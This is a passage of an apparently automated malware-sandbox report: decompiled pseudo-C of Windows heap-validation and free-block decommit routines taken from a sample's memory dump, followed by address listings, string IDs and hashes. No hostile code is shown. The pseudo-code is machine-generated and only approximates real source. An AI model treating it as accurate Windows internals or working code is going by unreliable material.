						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0181174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E017EB150();
							} else {
								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E017EB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E017EB150();
							} else {
								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E017EB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x18d6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E01829660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0181174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E017EB150();
										} else {
											E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E017EB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E017EB150();
									} else {
										E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E017EB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E017EB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E017EB150();
							} else {
								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E018A4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0189FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E018923E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                        0x018a44a1
                                                        0x018a44a3
                                                        0x018a44a7
                                                        0x018a44ac
                                                        0x018a44af
                                                        0x018a44b2
                                                        0x018a44b9
                                                        0x018a44bc
                                                        0x018a47f2
                                                        0x018a47f2
                                                        0x018a47f8
                                                        0x018a47fc
                                                        0x018a47fe
                                                        0x018a4804
                                                        0x018a4805
                                                        0x018a4805
                                                        0x018a480c
                                                        0x018a4810
                                                        0x018a4812
                                                        0x018a4812
                                                        0x018a4812
                                                        0x018a4822
                                                        0x018a4822
                                                        0x018a4827
                                                        0x018a4827
                                                        0x00000000
                                                        0x018a4827
                                                        0x018a44c4
                                                        0x018a44d3
                                                        0x018a44d9
                                                        0x018a44dc
                                                        0x018a44de
                                                        0x018a44e0
                                                        0x018a4560
                                                        0x018a4520
                                                        0x018a4522
                                                        0x018a4525
                                                        0x018a4528
                                                        0x018a452b
                                                        0x018a452e
                                                        0x018a4530
                                                        0x018a4697
                                                        0x018a469d
                                                        0x018a46a1
                                                        0x018a46c0
                                                        0x018a46c5
                                                        0x018a46a3
                                                        0x018a46b8
                                                        0x018a46bd
                                                        0x018a46cb
                                                        0x018a46d4
                                                        0x018a4677
                                                        0x018a4677
                                                        0x018a4679
                                                        0x018a467c
                                                        0x018a468a
                                                        0x018a4690
                                                        0x018a4690
                                                        0x018a47f1
                                                        0x018a47f1
                                                        0x018a47f1
                                                        0x00000000
                                                        0x018a47f1
                                                        0x018a4536
                                                        0x018a4539
                                                        0x018a453c
                                                        0x018a4636
                                                        0x018a463c
                                                        0x018a4640
                                                        0x018a465f
                                                        0x018a4664
                                                        0x018a4642
                                                        0x018a4657
                                                        0x018a465c
                                                        0x018a4670
                                                        0x00000000
                                                        0x018a4542
                                                        0x018a4542
                                                        0x018a4546
                                                        0x018a4548
                                                        0x018a454b
                                                        0x018a4555
                                                        0x018a455b
                                                        0x018a455b
                                                        0x018a455b
                                                        0x018a455d
                                                        0x018a455d
                                                        0x018a455d
                                                        0x00000000
                                                        0x018a455d
                                                        0x018a453c
                                                        0x018a4579
                                                        0x018a457c
                                                        0x018a4587
                                                        0x018a4589
                                                        0x018a4591
                                                        0x018a4592
                                                        0x018a4597
                                                        0x018a4598
                                                        0x018a45a1
                                                        0x018a45ab
                                                        0x018a45ab
                                                        0x018a45a1
                                                        0x018a45ae
                                                        0x018a45b4
                                                        0x018a45b9
                                                        0x018a45bd
                                                        0x018a4759
                                                        0x018a4759
                                                        0x018a475f
                                                        0x018a4761
                                                        0x018a4763
                                                        0x018a4765
                                                        0x018a4768
                                                        0x018a476b
                                                        0x018a476d
                                                        0x018a479c
                                                        0x018a479c
                                                        0x018a479f
                                                        0x018a47a2
                                                        0x018a47a4
                                                        0x018a4830
                                                        0x018a4833
                                                        0x018a4879
                                                        0x018a487d
                                                        0x018a48f1
                                                        0x018a48f3
                                                        0x018a48f3
                                                        0x00000000
                                                        0x018a48f3
                                                        0x018a487f
                                                        0x018a4885
                                                        0x018a4887
                                                        0x018a48a8
                                                        0x018a48a8
                                                        0x018a48ae
                                                        0x018a48b0
                                                        0x018a48dc
                                                        0x018a48dc
                                                        0x018a48dc
                                                        0x018a48dc
                                                        0x018a48ec
                                                        0x00000000
                                                        0x018a48ec
                                                        0x018a48b2
                                                        0x018a48bc
                                                        0x018a48be
                                                        0x018a48c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48c3
                                                        0x018a48c3
                                                        0x018a48c6
                                                        0x018a48c9
                                                        0x018a48cc
                                                        0x018a48d1
                                                        0x018a48d4
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48d6
                                                        0x018a48d7
                                                        0x018a48da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48da
                                                        0x018a494f
                                                        0x018a4955
                                                        0x018a4959
                                                        0x018a4978
                                                        0x018a497d
                                                        0x018a495b
                                                        0x018a4970
                                                        0x018a4975
                                                        0x018a4986
                                                        0x018a4987
                                                        0x018a498a
                                                        0x018a498d
                                                        0x018a4997
                                                        0x018a47ef
                                                        0x018a47ef
                                                        0x018a47ef
                                                        0x00000000
                                                        0x018a47ef
                                                        0x018a4890
                                                        0x018a4890
                                                        0x018a4891
                                                        0x018a4891
                                                        0x018a4894
                                                        0x018a4897
                                                        0x018a489d
                                                        0x018a48a0
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48a2
                                                        0x018a48a3
                                                        0x018a48a6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48a6
                                                        0x018a48fb
                                                        0x018a4901
                                                        0x018a4905
                                                        0x018a4924
                                                        0x018a4929
                                                        0x018a4907
                                                        0x018a491c
                                                        0x018a4921
                                                        0x018a492f
                                                        0x018a4935
                                                        0x018a4936
                                                        0x018a4939
                                                        0x018a4942
                                                        0x00000000
                                                        0x018a4947
                                                        0x018a4835
                                                        0x018a483b
                                                        0x018a483f
                                                        0x018a485e
                                                        0x018a4863
                                                        0x018a4841
                                                        0x018a4856
                                                        0x018a485b
                                                        0x018a4869
                                                        0x018a486c
                                                        0x018a486f
                                                        0x018a47e7
                                                        0x018a47e7
                                                        0x00000000
                                                        0x018a47ec
                                                        0x018a47aa
                                                        0x018a47b0
                                                        0x018a47b4
                                                        0x018a47d3
                                                        0x018a47d8
                                                        0x018a47b6
                                                        0x018a47cb
                                                        0x018a47d0
                                                        0x018a47de
                                                        0x018a47df
                                                        0x018a47e2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a476f
                                                        0x018a476f
                                                        0x018a4778
                                                        0x018a4785
                                                        0x018a4787
                                                        0x018a478c
                                                        0x018a478e
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4790
                                                        0x018a4792
                                                        0x018a4794
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4796
                                                        0x018a4799
                                                        0x00000000
                                                        0x018a4799
                                                        0x00000000
                                                        0x018a45c3
                                                        0x018a45c3
                                                        0x018a45c7
                                                        0x018a45c7
                                                        0x018a45ca
                                                        0x018a45cf
                                                        0x018a45d3
                                                        0x018a45df
                                                        0x018a45e4
                                                        0x018a45e6
                                                        0x018a45e8
                                                        0x018a45ed
                                                        0x018a45ed
                                                        0x018a45f2
                                                        0x018a45f2
                                                        0x018a45f7
                                                        0x018a45fc
                                                        0x018a4602
                                                        0x018a4606
                                                        0x018a4609
                                                        0x018a460f
                                                        0x018a46de
                                                        0x018a46e3
                                                        0x018a46e5
                                                        0x018a46ec
                                                        0x018a46ee
                                                        0x018a46f6
                                                        0x018a46f6
                                                        0x018a46f6
                                                        0x018a46f6
                                                        0x018a46ec
                                                        0x018a4615
                                                        0x018a4615
                                                        0x018a461d
                                                        0x018a462e
                                                        0x018a462e
                                                        0x018a461d
                                                        0x018a460f
                                                        0x018a4609
                                                        0x018a46fd
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4710
                                                        0x018a471a
                                                        0x018a4720
                                                        0x018a4720
                                                        0x018a4722
                                                        0x018a472c
                                                        0x00000000
                                                        0x018a472e
                                                        0x018a472e
                                                        0x00000000
                                                        0x018a472e
                                                        0x018a472c
                                                        0x018a4738
                                                        0x018a473c
                                                        0x018a474b
                                                        0x018a4751
                                                        0x018a4751
                                                        0x00000000
                                                        0x018a473c
                                                        0x018a48f4
                                                        0x018a48f4
                                                        0x00000000
                                                        0x018a48f4

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                        • API String ID: 0-1357697941
                                                        • Opcode ID: 6ec5c21b1e3c52f46aed1a919360d9ac7a3140391da13e4e612b8f2093c3458b
                                                        • Instruction ID: f46a267a38d8e0faf51def5d74db4e86e43f702c9342c66056d44ed13ec60d9e
                                                        • Opcode Fuzzy Hash: 6ec5c21b1e3c52f46aed1a919360d9ac7a3140391da13e4e612b8f2093c3458b
                                                        • Instruction Fuzzy Hash: 41F1FE3160064ADFEF25CB6DC488BAAFBF5FF08714F988019E186D7641D7B0AA45CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E0180A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x18d8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0180A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0180DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E017E9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E017EA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x18d8748 - 1;
						if( *0x18d8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E017EB150();
								__eflags =  *0x18d7bc8;
								if( *0x18d7bc8 == 0) {
									__eflags = 1;
									E018A2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x18d8748 - 1;
							if( *0x18d8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0181174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01807D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E018A14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E017E9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E017E9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x18d8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E017EB150();
											} else {
												E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E017EB150();
											_pop(_t491);
											__eflags =  *0x18d7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E018A2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E018AA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0180A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01807D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01807D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E018A1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01807D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01807D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x18d8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
